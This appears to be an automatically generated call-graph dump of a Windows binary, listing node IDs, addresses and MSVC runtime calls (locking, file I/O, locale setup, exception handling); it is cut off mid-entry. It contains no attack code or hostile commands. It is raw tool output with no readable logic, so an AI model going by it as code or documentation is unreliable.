codecvt EnterCriticalSection LeaveCriticalSection 13622->13623 13623->13618 13623->13619 13623->13622 13625 46ebfa _unexpected EnterCriticalSection LeaveCriticalSection 13624->13625 13626 46eb02 13625->13626 13627 46ec4c _unexpected 14 API calls 13626->13627 13628 46ea0f 13627->13628 13628->13606 13630 46b4d5 __fread_nolock std::locale::_Setgloballocale 13629->13630 13631 46b501 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13630->13631 13632 46b5d2 std::locale::_Setgloballocale 13631->13632 13633 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13632->13633 13634 46b4a6 GetCurrentProcess TerminateProcess 13633->13634 13634->13481 13636 463c45 13635->13636 13638 463c4c 13635->13638 13637 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13636->13637 13639 463d31 13637->13639 13638->13636 13641 463cf2 13638->13641 13642 463c92 13638->13642 13639->13421 13641->13636 13643 46c578 69 API calls 13641->13643 13642->13636 13669 4635da 13642->13669 13643->13636 13645 463c22 13644->13645 13646 463c6e 13644->13646 13702 468773 LeaveCriticalSection 13645->13702 13647 463bf9 13646->13647 13650 463cf2 13646->13650 13651 463cd3 13646->13651 13647->13421 13649 463c27 13649->13421 13652 46c578 69 API calls 13650->13652 13656 463ce4 13650->13656 13654 4635da _Fputc 68 API calls 13651->13654 13651->13656 13652->13656 13653 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13655 463d31 13653->13655 13654->13656 13655->13421 13656->13653 13658 463c12 13657->13658 13663 463c5e 13657->13663 13703 46875f EnterCriticalSection 13658->13703 13660 463c17 13660->13421 13661 463c62 13662 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13661->13662 13664 463d31 13662->13664 13663->13661 13666 463cf2 13663->13666 13667 463c92 13663->13667 13664->13421 13665 4635da _Fputc 68 API calls 13665->13661 13666->13661 13668 46c578 69 API calls 13666->13668 13667->13661 13667->13665 13668->13661 13672 46c079 13669->13672 13671 4635ea 13671->13636 13673 46c08c _Fputc 13672->13673 13676 46c0da 13673->13676 13675 46c09b _Fputc 13675->13671 13677 46c0e6 ___scrt_is_nonwritable_in_current_image 13676->13677 13678 46c113 13677->13678 13679 46c0ef 13677->13679 13692 46875f EnterCriticalSection 13678->13692 13680 46b601 _Fputc 29 API calls 13679->13680 13690 46c108 _Fputc 13680->13690 13682 46c11c 13683 470efc __fread_nolock 29 API calls 13682->13683 13684 46c131 13682->13684 13683->13684 13685 46c1ce 13684->13685 13686 46c19d 13684->13686 13693 46c0ad 13685->13693 13688 46b601 _Fputc 29 API calls 13686->13688 13688->13690 13689 46c1da 13698 46c206 13689->13698 13690->13675 13692->13682 13694 46c0cc 13693->13694 13695 46c0bb 13693->13695 13694->13689 13696 475eec _Fputc 66 API calls 13695->13696 13697 46c0c7 13696->13697 13697->13689 13701 468773 LeaveCriticalSection 13698->13701 13700 46c20c 13700->13690 13701->13700 13702->13649 13703->13660 13705 465ad4 13704->13705 13706 465b02 RaiseException 13704->13706 13705->13706 13706->13429 13708 461c7a 13707->13708 13714 461b17 13707->13714 13735 4629d4 AcquireSRWLockExclusive 13708->13735 13710 461c84 13710->13714 13740 462a89 13710->13740 13715 461b3a 13714->13715 13716 461e48 std::ios_base::_Init 40 API calls 13715->13716 13717 461b2f 13716->13717 13717->13436 13719 461e75 _strlen 13718->13719 13720 461e80 13719->13720 13721 461f5e 13719->13721 13723 461ed0 13720->13723 13724 461ec8 13720->13724 13729 461e8f _Yarn 13720->13729 13722 461860 std::ios_base::_Init 31 API calls 13721->13722 13725 461f63 13722->13725 13727 462952 codecvt 16 API calls 13723->13727 13726 46186a std::ios_base::_Init 31 API calls 13724->13726 13728 46b468 std::ios_base::_Init 29 API calls 13725->13728 13726->13729 13727->13729 13728->13725 13779 461f68 13729->13779 13732 461f30 _Deallocate 13733 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13732->13733 13734 461b4f 13733->13734 13734->13393 13739 4629e8 13735->13739 13736 4629ed ReleaseSRWLockExclusive 13736->13710 13739->13736 13744 462a74 SleepConditionVariableSRW 13739->13744 13745 462a9e 13740->13745 13743 462a23 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 13743->13714 13744->13739 13746 462ab4 13745->13746 13747 462aad 13745->13747 13754 46aa54 13746->13754 13751 46aac5 13747->13751 13750 461c9a 13750->13743 13752 46aa54 std::ios_base::_Init 32 API calls 13751->13752 13753 46aad7 13752->13753 13753->13750 13757 46acb7 13754->13757 13758 46acc3 ___scrt_is_nonwritable_in_current_image 13757->13758 13765 46b750 EnterCriticalSection 13758->13765 13760 46acd1 13766 46aadb 13760->13766 13762 46acde 13776 46ad06 13762->13776 13765->13760 13767 46aaf6 13766->13767 13768 46ab69 _unexpected 13766->13768 13767->13768 13769 46ab49 13767->13769 13770 473f46 std::ios_base::_Init 32 API calls 13767->13770 13768->13762 13769->13768 13771 473f46 std::ios_base::_Init 32 API calls 13769->13771 13772 46ab3f 13770->13772 13773 46ab5f 13771->13773 13774 46e4f7 ___free_lconv_mon 14 API calls 13772->13774 13775 46e4f7 ___free_lconv_mon 14 API calls 13773->13775 13774->13769 13775->13768 13777 46b767 std::_Lockit::~_Lockit LeaveCriticalSection 13776->13777 13778 46aa85 13777->13778 13778->13750 13780 461fa0 13779->13780 13781 4620be 13780->13781 13782 461faa 13780->13782 13783 461860 std::ios_base::_Init 31 API calls 13781->13783 13785 461ff0 13782->13785 13786 461fe8 13782->13786 13792 461fb2 _Yarn 13782->13792 13784 4620c3 13783->13784 13788 46b468 std::ios_base::_Init 29 API calls 13784->13788 13790 462952 codecvt 16 API calls 13785->13790 13789 46186a std::ios_base::_Init 31 API calls 13786->13789 13788->13784 13789->13792 13790->13792 13798 4620c8 13792->13798 13795 462085 _Deallocate 13796 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13795->13796 13797 461f0d 13796->13797 13797->13725 13797->13732 13799 4620ea 13798->13799 13800 4620f8 13798->13800 13817 46218a 13799->13817 13802 46218a std::ios_base::_Init 40 API calls 13800->13802 13803 46211b 13802->13803 13804 46213f _Deallocate 13803->13804 13807 462185 13803->13807 13805 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13804->13805 13806 462029 13805->13806 13809 466097 13806->13809 13808 46b468 std::ios_base::_Init 29 API calls 13807->13808 13808->13807 13810 4660a4 13809->13810 13816 462059 13809->13816 13810->13816 13832 46c994 13810->13832 13813 4660d1 13848 46c522 13813->13848 13816->13784 13816->13795 13818 4621a9 13817->13818 13824 46224f _Yarn _Deallocate 13817->13824 13819 4622f3 13818->13819 13820 4621b8 13818->13820 13822 461860 std::ios_base::_Init 31 API calls 13819->13822 13821 4621e3 13820->13821 13826 4622e8 13820->13826 13830 4621e9 _Yarn 13820->13830 13823 46186a std::ios_base::_Init 31 API calls 13821->13823 13822->13830 13823->13830 13824->13800 13825 46b468 std::ios_base::_Init 29 API calls 13829 4622fd 13825->13829 13827 462952 codecvt 16 API calls 13826->13827 13827->13830 13828 462339 13828->13800 13829->13828 13831 461ab6 std::ios_base::_Init 40 API calls 13829->13831 13830->13824 13830->13825 13831->13828 13837 46e531 _unexpected 13832->13837 13833 46e56f 13854 46ad6d 13833->13854 13835 46e55a RtlAllocateHeap 13836 4660c1 13835->13836 13835->13837 13836->13813 13839 46e16c 13836->13839 13837->13833 13837->13835 13851 468f08 13837->13851 13840 46e17a 13839->13840 13841 46e188 13839->13841 13840->13841 13846 46e1a0 13840->13846 13842 46ad6d __dosmaperr 14 API calls 13841->13842 13843 46e190 13842->13843 13886 46b458 13843->13886 13845 46e19a 13845->13813 13846->13845 13847 46ad6d __dosmaperr 14 API calls 13846->13847 13847->13843 13849 46e4f7 ___free_lconv_mon 14 API calls 13848->13849 13850 46c53a 13849->13850 13850->13816 13857 468f43 13851->13857 13863 46e8d4 GetLastError 13854->13863 13856 46ad72 13856->13836 13858 468f4f ___scrt_is_nonwritable_in_current_image 13857->13858 13859 46b750 std::_Lockit::_Lockit EnterCriticalSection 13858->13859 13860 468f5a std::locale::_Setgloballocale 13859->13860 13861 468f91 codecvt LeaveCriticalSection 13860->13861 13862 468f13 13861->13862 13862->13837 13864 46e8ea 13863->13864 13867 46e8f0 13863->13867 13865 46f19b _unexpected 6 API calls 13864->13865 13865->13867 13866 46f1da _unexpected 6 API calls 13868 46e90c 13866->13868 13867->13866 13883 46e8f4 SetLastError 13867->13883 13870 46f807 _unexpected 12 API calls 13868->13870 13868->13883 13871 46e921 13870->13871 13872 46e93a 13871->13872 13873 46e929 13871->13873 13875 46f1da _unexpected 6 API calls 13872->13875 13874 46f1da _unexpected 6 API calls 13873->13874 13877 46e937 13874->13877 13876 46e946 13875->13876 13878 46e961 13876->13878 13879 46e94a 13876->13879 13881 46e4f7 ___free_lconv_mon 12 API calls 13877->13881 13882 46ea94 _unexpected 12 API calls 13878->13882 13880 46f1da _unexpected 6 API calls 13879->13880 13880->13877 13881->13883 13884 46e96c 13882->13884 13883->13856 13885 46e4f7 ___free_lconv_mon 12 API calls 13884->13885 13885->13883 13889 46b6a7 13886->13889 13888 46b464 13888->13845 13890 46b6b9 _Fputc 13889->13890 13891 46b601 _Fputc 29 API calls 13890->13891 13892 46b6d1 _Fputc 13891->13892 13892->13888 13894 462339 13893->13894 13895 46230b 13893->13895 13894->13442 13895->13894 13896 461ab6 std::ios_base::_Init 40 API calls 13895->13896 13896->13894 13898 4623ea 13897->13898 13914 46242b 13898->13914 13901 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13902 461546 13901->13902 13903 46233c 13902->13903 13904 46197e 40 API calls 13903->13904 13905 462358 13904->13905 13906 462372 13905->13906 13907 4619d8 69 API calls 13905->13907 13908 461ab6 std::ios_base::_Init 40 API calls 13906->13908 13907->13906 13909 4623a7 13908->13909 13910 461a10 40 API calls 13909->13910 13911 4623ae 13910->13911 13912 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13911->13912 13913 461551 13912->13913 13913->13409 13931 462cd9 13914->13931 13918 46245e 13930 46248c 13918->13930 13945 46254a 13918->13945 13920 4624a8 13922 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13920->13922 13924 4623f0 13922->13924 13924->13901 13925 462483 13957 462d7d 13925->13957 13926 4624bc 13970 4625d6 13926->13970 13963 462d0a 13930->13963 13932 462cef 13931->13932 13933 462ce8 13931->13933 13935 46244b 13932->13935 13986 4651f8 EnterCriticalSection 13932->13986 13981 46b77e 13933->13981 13937 4624c2 13935->13937 13938 4624fc 13937->13938 13939 4624d8 13937->13939 13941 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13938->13941 13940 462cd9 std::_Lockit::_Lockit 7 API calls 13939->13940 13942 4624e3 13940->13942 13943 462509 13941->13943 13944 462d0a std::_Lockit::~_Lockit 2 API calls 13942->13944 13943->13918 13944->13938 13946 462563 13945->13946 13947 4625bf 13945->13947 13946->13947 13950 462952 codecvt 16 API calls 13946->13950 13948 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13947->13948 13949 46247b 13948->13949 13949->13925 13949->13926 13951 462573 13950->13951 14044 4625fa 13951->14044 13958 46c994 ___std_exception_copy 15 API calls 13957->13958 13959 462d88 13958->13959 13960 462d8f 13959->13960 14216 4631b3 13959->14216 13960->13930 13964 462d14 13963->13964 13965 46b78c 13963->13965 13966 462d27 13964->13966 14220 465206 LeaveCriticalSection 13964->14220 14221 46b767 LeaveCriticalSection 13965->14221 13966->13920 13969 46b793 13969->13920 13971 465aba Concurrency::cancel_current_task RaiseException 13970->13971 13972 4625fa 13971->13972 13973 462cd9 std::_Lockit::_Lockit 7 API calls 13972->13973 13974 46260b 13973->13974 13975 462647 13974->13975 13976 462635 13974->13976 13978 4631f0 codecvt 31 API calls 13975->13978 13977 462dff codecvt 65 API calls 13976->13977 13979 4624c1 13977->13979 13980 462651 13978->13980 13987 46f432 13981->13987 13986->13935 14008 46f5b9 13987->14008 14007 46f464 14007->14007 14038 46f534 14008->14038 14010 46f437 14011 46f5d3 14010->14011 14012 46f534 _unexpected 5 API calls 14011->14012 14013 46f43c 14012->14013 14014 46f5ed 14013->14014 14015 46f534 _unexpected 5 API calls 14014->14015 14016 46f441 14015->14016 14017 46f607 14016->14017 14018 46f534 _unexpected 5 API calls 14017->14018 14019 46f446 14018->14019 14020 46f621 14019->14020 14021 46f534 _unexpected 5 API calls 14020->14021 14022 46f44b 14021->14022 14023 46f63b 14022->14023 14024 46f534 _unexpected 5 API calls 14023->14024 14025 46f450 14024->14025 14026 46f655 14025->14026 14027 46f534 _unexpected 5 API calls 14026->14027 14028 46f455 14027->14028 14029 46f66f 14028->14029 14030 46f534 _unexpected 5 API calls 14029->14030 14031 46f45a 14030->14031 14032 46f689 14031->14032 14033 46f534 _unexpected 5 API calls 14032->14033 14034 46f45f 14033->14034 14035 46f6a3 14034->14035 14036 46f534 _unexpected 5 API calls 14035->14036 14037 46f6b9 14036->14037 14037->14007 14039 46f564 14038->14039 14043 46f560 _unexpected 14038->14043 14040 46f469 _unexpected LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 14039->14040 14039->14043 14041 46f578 14040->14041 14042 46f57e GetProcAddress 14041->14042 14041->14043 14042->14043 14043->14010 14045 462cd9 std::_Lockit::_Lockit 7 API calls 14044->14045 14046 46260b 14045->14046 14047 462647 14046->14047 14048 462635 14046->14048 14089 4631f0 14047->14089 14080 462dff 14048->14080 14053 464915 14124 468588 14053->14124 14055 46491e __Getctype 14056 464956 14055->14056 14057 464938 14055->14057 14058 4688c6 __Getctype 39 API calls 14056->14058 14129 4688c6 14057->14129 14060 46493f 14058->14060 14134 468561 14060->14134 14063 4625b3 14065 462652 14063->14065 14212 462e4b 14065->14212 14068 46266b 14070 462682 14068->14070 14071 46c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 14068->14071 14069 46c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 14069->14068 14072 462699 14070->14072 14073 46c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 14070->14073 14071->14070 14074 4626b0 14072->14074 14075 46c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 14072->14075 14073->14072 14076 4626c7 14074->14076 14077 46c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 14074->14077 14075->14074 14078 4626de 14076->14078 14079 46c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 14076->14079 14077->14076 14079->14078 14096 46c99f 14080->14096 14084 462e24 14085 462e33 14084->14085 14086 46c99f std::_Locinfo::_Locinfo_dtor 64 API calls 14084->14086 14087 462e65 _Yarn 15 API calls 14085->14087 14086->14085 14088 46259b 14087->14088 14088->14053 14115 463292 14089->14115 14092 465aba Concurrency::cancel_current_task RaiseException 14093 46320f 14092->14093 14118 461918 14093->14118 14097 46f432 std::_Lockit::_Lockit 5 API calls 14096->14097 14098 46c9ac 14097->14098 14107 46cbd1 14098->14107 14101 462e65 14102 462e73 14101->14102 14106 462e9e _Yarn 14101->14106 14103 462e7f 14102->14103 14104 46c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 14102->14104 14105 46c994 ___std_exception_copy 15 API calls 14103->14105 14103->14106 14104->14103 14105->14106 14106->14084 14108 46cbdd ___scrt_is_nonwritable_in_current_image 14107->14108 14109 46b750 std::_Lockit::_Lockit EnterCriticalSection 14108->14109 14110 46cbeb 14109->14110 14111 46ca72 std::_Locinfo::_Locinfo_dtor 64 API calls 14110->14111 14112 46cbf8 14111->14112 14113 46cc20 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 14112->14113 14114 462e0c 14113->14114 14114->14101 14121 463155 14115->14121 14119 466097 ___std_exception_copy 30 API calls 14118->14119 14120 46193a 14119->14120 14122 466097 ___std_exception_copy 30 API calls 14121->14122 14123 463181 14122->14123 14123->14092 14148 46e783 GetLastError 14124->14148 14130 46e783 _unexpected 39 API calls 14129->14130 14131 4688d1 14130->14131 14132 46ed66 __Getctype 39 API calls 14131->14132 14133 4688e1 14132->14133 14133->14060 14135 46e783 _unexpected 39 API calls 14134->14135 14136 46856c 14135->14136 14137 46ed66 __Getctype 39 API calls 14136->14137 14138 464967 14137->14138 14138->14063 14139 46b963 14138->14139 14140 46b970 14139->14140 14145 46b9ab 14139->14145 14141 46c994 ___std_exception_copy 15 API calls 14140->14141 14142 46b993 14141->14142 14142->14145 14203 46ee22 14142->14203 14145->14063 14146 46b485 __Getctype 11 API calls 14147 46b9c1 14146->14147 14149 46e79f 14148->14149 14150 46e799 14148->14150 14152 46f1da _unexpected 6 API calls 14149->14152 14154 46e7a3 SetLastError 14149->14154 14151 46f19b _unexpected 6 API calls 14150->14151 14151->14149 14153 46e7bb 14152->14153 14153->14154 14155 46f807 _unexpected 14 API calls 14153->14155 14158 468593 14154->14158 14159 46e838 14154->14159 14157 46e7d0 14155->14157 14160 46e7d8 14157->14160 14161 46e7e9 14157->14161 14175 46ed66 14158->14175 14179 46b9c2 14159->14179 14163 46f1da _unexpected 6 API calls 14160->14163 14164 46f1da _unexpected 6 API calls 14161->14164 14173 46e7e6 14163->14173 14166 46e7f5 14164->14166 14167 46e810 14166->14167 14168 46e7f9 14166->14168 14171 46ea94 _unexpected 14 API calls 14167->14171 14169 46f1da _unexpected 6 API calls 14168->14169 14169->14173 14170 46e4f7 ___free_lconv_mon 14 API calls 14170->14154 14172 46e81b 14171->14172 14174 46e4f7 ___free_lconv_mon 14 API calls 14172->14174 14173->14170 14174->14154 14176 46ed79 14175->14176 14178 4685a3 14175->14178 14176->14178 14190 472046 14176->14190 14178->14055 14180 4708cc std::locale::_Setgloballocale EnterCriticalSection LeaveCriticalSection 14179->14180 14181 46b9c7 14180->14181 14182 4708f3 std::locale::_Setgloballocale 38 API calls 14181->14182 14187 46b9d2 14181->14187 14182->14187 14183 46b9fb 14186 468bec std::locale::_Setgloballocale 21 API calls 14183->14186 14184 46b9dc IsProcessorFeaturePresent 14185 46b9e8 14184->14185 14188 46b4b9 std::locale::_Setgloballocale 8 API calls 14185->14188 14189 46ba05 14186->14189 14187->14183 14187->14184 14188->14183 14191 472052 ___scrt_is_nonwritable_in_current_image 14190->14191 14192 46e783 _unexpected 39 API calls 14191->14192 14193 47205b 14192->14193 14194 4720a1 14193->14194 14195 46b750 std::_Lockit::_Lockit EnterCriticalSection 14193->14195 14194->14178 14196 472079 14195->14196 14197 4720c7 __Getctype 14 API calls 14196->14197 14198 47208a 14197->14198 14199 4720a6 __Getctype LeaveCriticalSection 14198->14199 14200 47209d 14199->14200 14200->14194 14201 46b9c2 CallUnexpected 39 API calls 14200->14201 14202 4720c6 14201->14202 14204 46ee3e 14203->14204 14205 46ee30 14203->14205 14206 46ad6d __dosmaperr 14 API calls 14204->14206 14205->14204 14207 46ee58 14205->14207 14211 46ee48 14206->14211 14209 46b9a4 14207->14209 14210 46ad6d __dosmaperr 14 API calls 14207->14210 14208 46b458 __strnicoll 29 API calls 14208->14209 14209->14145 14209->14146 14210->14211 14211->14208 14213 462e57 14212->14213 14214 46265b 14212->14214 14215 46c99f std::_Locinfo::_Locinfo_dtor 64 API calls 14213->14215 14214->14068 14214->14069 14215->14214 14217 4631c1 Concurrency::cancel_current_task 14216->14217 14218 465aba Concurrency::cancel_current_task RaiseException 14217->14218 14219 4631cf 14218->14219 14220->13966 14221->13969 14223 465aba Concurrency::cancel_current_task RaiseException 14222->14223 14224 4618b4 14223->14224 14225 466097 ___std_exception_copy 30 API calls 14224->14225 14226 4618d6 14225->14226 14226->13350 14227->13372 14233 463258 14228->14233 14231 465aba Concurrency::cancel_current_task RaiseException 14232 4631ef 14231->14232 14234 463155 std::exception::exception 30 API calls 14233->14234 14235 4631e1 14234->14235 14235->14231 16117 46422c 16118 464263 16117->16118 16119 46424e 16117->16119 16123 4643df 16119->16123 16126 4643f9 16123->16126 16128 464448 16123->16128 16124 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 16125 464253 16124->16125 16125->16118 16129 46c53d 16125->16129 16127 46c578 69 API calls 16126->16127 16126->16128 16127->16128 16128->16124 16130 46c55d 16129->16130 16131 46c548 16129->16131 16130->16131 16133 46c564 16130->16133 16132 46ad6d __dosmaperr 14 API calls 16131->16132 16134 46c54d 16132->16134 16139 46ae1d 16133->16139 16136 46b458 __strnicoll 29 API calls 16134->16136 16138 46c558 16136->16138 16137 46c573 16137->16118 16138->16118 16140 46ae30 _Fputc 16139->16140 16143 46b096 16140->16143 16142 46ae45 _Fputc 16142->16137 16145 46b0a2 ___scrt_is_nonwritable_in_current_image 16143->16145 16144 46b0a8 16146 46b601 _Fputc 29 API calls 16144->16146 16145->16144 16148 46b0eb 16145->16148 16147 46b0c3 16146->16147 16147->16142 16154 46875f EnterCriticalSection 16148->16154 16150 46b0f7 16155 46afaa 16150->16155 16152 46b10d 16166 46b136 16152->16166 16154->16150 16156 46afd0 16155->16156 16157 46afbd 16155->16157 16169 46aed1 16156->16169 16157->16152 16159 46aff3 16160 46b081 16159->16160 16161 46b00e 16159->16161 16173 47424d 16159->16173 16160->16152 16163 46bc27 ___scrt_uninitialize_crt 64 API calls 16161->16163 16164 46b021 16163->16164 16187 474033 16164->16187 16228 468773 LeaveCriticalSection 16166->16228 16168 46b13e 16168->16147 16170 46af3a 16169->16170 16171 46aee2 16169->16171 16170->16159 16171->16170 16172 473ff3 __fread_nolock 31 API calls 16171->16172 16172->16170 16174 47461f 16173->16174 16175 474656 16174->16175 16176 47462e 16174->16176 16178 470efc __fread_nolock 29 API calls 16175->16178 16177 46b601 _Fputc 29 API calls 16176->16177 16186 474649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16177->16186 16179 47465f 16178->16179 16190 474051 16179->16190 16182 474709 16193 4742a9 16182->16193 16183 474720 16183->16186 16205 474454 16183->16205 16186->16161 16188 474194 __fread_nolock 31 API calls 16187->16188 16189 47404c 16188->16189 16189->16160 16212 47406f 16190->16212 16194 4742b8 _Fputc 16193->16194 16195 470efc __fread_nolock 29 API calls 16194->16195 16197 4742d4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16195->16197 16196 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 16198 474452 16196->16198 16199 474051 33 API calls 16197->16199 16204 4742e0 16197->16204 16198->16186 16200 474334 16199->16200 16201 474366 ReadFile 16200->16201 16200->16204 16202 47438d 16201->16202 16201->16204 16203 474051 33 API calls 16202->16203 16203->16204 16204->16196 16206 470efc __fread_nolock 29 API calls 16205->16206 16207 474467 16206->16207 16208 4744b1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16207->16208 16209 474051 33 API calls 16207->16209 16208->16186 16210 47450e 16209->16210 16210->16208 16211 474051 33 API calls 16210->16211 16211->16208 16213 47407b ___scrt_is_nonwritable_in_current_image 16212->16213 16214 4740be 16213->16214 16215 474104 16213->16215 16222 47406a 16213->16222 16216 46b601 _Fputc 29 API calls 16214->16216 16223 474ef9 EnterCriticalSection 16215->16223 16216->16222 16218 47410a 16219 47412b 16218->16219 16220 474194 __fread_nolock 31 API calls 16218->16220 16224 47418c 16219->16224 16220->16219 16222->16182 16222->16183 16222->16186 16223->16218 16227 474f1c LeaveCriticalSection 16224->16227 16226 474192 16226->16222 16227->16226 16228->16168 14236 4657d0 14237 4657dc ___scrt_is_nonwritable_in_current_image 14236->14237 14263 462baf 14237->14263 14239 4657e3 14240 46593c 14239->14240 14250 46580d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 14239->14250 14299 465020 IsProcessorFeaturePresent 14240->14299 14242 465943 14243 465949 14242->14243 14303 468bd6 14242->14303 14306 468bec 14243->14306 14247 46582c 14248 4658ad 14281 46b145 14248->14281 14250->14247 14250->14248 14251 4658a6 14250->14251 14274 468c20 14251->14274 14253 4658b3 14285 48804b 14253->14285 14258 4658d8 14259 4658e1 14258->14259 14290 468c02 14258->14290 14293 462be8 14259->14293 14264 462bb8 14263->14264 14309 464c8c IsProcessorFeaturePresent 14264->14309 14268 462bc9 14269 462bcd 14268->14269 14319 46867a 14268->14319 14269->14239 14272 462be4 14272->14239 14275 468c36 _unexpected 14274->14275 14276 46cf0b ___scrt_is_nonwritable_in_current_image 14274->14276 14275->14248 14277 46e783 _unexpected 39 API calls 14276->14277 14280 46cf1c 14277->14280 14278 46b9c2 CallUnexpected 39 API calls 14279 46cf46 14278->14279 14280->14278 14282 46b14e 14281->14282 14283 46b153 14281->14283 14391 46b26e 14282->14391 14283->14253 14947 488000 GetModuleHandleA GetModuleFileNameA ExitProcess 14285->14947 14288 464fcd GetModuleHandleW 14289 464fd9 14288->14289 14289->14242 14289->14258 14950 468d21 14290->14950 14294 462bf4 14293->14294 14295 462c0a 14294->14295 15021 46868c 14294->15021 14295->14247 14297 462c02 14298 466188 ___scrt_uninitialize_crt 7 API calls 14297->14298 14298->14295 14300 465036 __fread_nolock std::locale::_Setgloballocale 14299->14300 14301 4650e1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14300->14301 14302 465125 std::locale::_Setgloballocale 14301->14302 14302->14242 14304 468d21 std::locale::_Setgloballocale 21 API calls 14303->14304 14305 468be7 14304->14305 14305->14243 14307 468d21 std::locale::_Setgloballocale 21 API calls 14306->14307 14308 465951 14307->14308 14310 462bc4 14309->14310 14311 466169 14310->14311 14328 46e1c6 14311->14328 14315 466185 14315->14268 14316 46617a 14316->14315 14342 46e202 14316->14342 14318 466172 14318->14268 14382 470815 14319->14382 14322 466188 14323 466191 14322->14323 14324 46619b 14322->14324 14325 46d297 ___vcrt_uninitialize_ptd 6 API calls 14323->14325 14324->14269 14326 466196 14325->14326 14327 46e202 ___vcrt_uninitialize_locks DeleteCriticalSection 14326->14327 14327->14324 14329 46e1cf 14328->14329 14331 46e1f8 14329->14331 14332 46616e 14329->14332 14346 477e4b 14329->14346 14333 46e202 ___vcrt_uninitialize_locks DeleteCriticalSection 14331->14333 14332->14318 14334 46d264 14332->14334 14333->14332 14363 477d5c 14334->14363 14338 46d294 14338->14316 14341 46d279 14341->14316 14343 46e20d 14342->14343 14345 46e22c 14342->14345 14344 46e217 DeleteCriticalSection 14343->14344 14344->14344 14344->14345 14345->14318 14351 477edd 14346->14351 14349 477e83 InitializeCriticalSectionAndSpinCount 14350 477e6e 14349->14350 14350->14329 14352 477efe 14351->14352 14353 477e65 14351->14353 14352->14353 14354 477f66 GetProcAddress 14352->14354 14356 477f57 14352->14356 14358 477e92 LoadLibraryExW 14352->14358 14353->14349 14353->14350 14354->14353 14356->14354 14357 477f5f FreeLibrary 14356->14357 14357->14354 14359 477ed9 14358->14359 14360 477ea9 GetLastError 14358->14360 14359->14352 14360->14359 14361 477eb4 ___vcrt_InitializeCriticalSectionEx 14360->14361 14361->14359 14362 477eca LoadLibraryExW 14361->14362 14362->14352 14364 477edd ___vcrt_InitializeCriticalSectionEx 5 API calls 14363->14364 14365 477d76 14364->14365 14366 477d8f TlsAlloc 14365->14366 14367 46d26e 14365->14367 14367->14341 14368 477e0d 14367->14368 14369 477edd ___vcrt_InitializeCriticalSectionEx 5 API calls 14368->14369 14370 477e27 14369->14370 14371 477e42 TlsSetValue 14370->14371 14372 46d287 14370->14372 14371->14372 14372->14338 14373 46d297 14372->14373 14374 46d2a1 14373->14374 14375 46d2a7 14373->14375 14377 477d97 14374->14377 14375->14341 14378 477edd ___vcrt_InitializeCriticalSectionEx 5 API calls 14377->14378 14379 477db1 14378->14379 14380 477dc9 TlsFree 14379->14380 14381 477dbd 14379->14381 14380->14381 14381->14375 14383 470825 14382->14383 14384 462bd6 14382->14384 14383->14384 14386 46ff89 14383->14386 14384->14272 14384->14322 14387 46ff90 14386->14387 14388 46ffd3 GetStdHandle 14387->14388 14389 470035 14387->14389 14390 46ffe6 GetFileType 14387->14390 14388->14387 14389->14383 14390->14387 14392 46b277 14391->14392 14396 46b28d 14391->14396 14392->14396 14397 46b1af 14392->14397 14394 46b284 14394->14396 14414 46b37c 14394->14414 14396->14283 14398 46b1bb 14397->14398 14399 46b1b8 14397->14399 14423 47004c 14398->14423 14399->14394 14404 46b1cc 14407 46e4f7 ___free_lconv_mon 14 API calls 14404->14407 14405 46b1d8 14450 46b29a 14405->14450 14409 46b1d2 14407->14409 14409->14394 14410 46e4f7 ___free_lconv_mon 14 API calls 14411 46b1fc 14410->14411 14412 46e4f7 ___free_lconv_mon 14 API calls 14411->14412 14413 46b202 14412->14413 14413->14394 14415 46b38b 14414->14415 14416 46b3ed 14414->14416 14415->14416 14417 46f807 _unexpected 14 API calls 14415->14417 14418 46b3f1 14415->14418 14419 46e641 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 14415->14419 14422 46e4f7 ___free_lconv_mon 14 API calls 14415->14422 14669 474926 14415->14669 14416->14396 14417->14415 14420 46e4f7 ___free_lconv_mon 14 API calls 14418->14420 14419->14415 14420->14416 14422->14415 14424 470055 14423->14424 14425 46b1c1 14423->14425 14472 46e83e 14424->14472 14429 47484f GetEnvironmentStringsW 14425->14429 14430 474867 14429->14430 14435 46b1c6 14429->14435 14431 46e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 14430->14431 14432 474884 14431->14432 14433 47488e FreeEnvironmentStringsW 14432->14433 14434 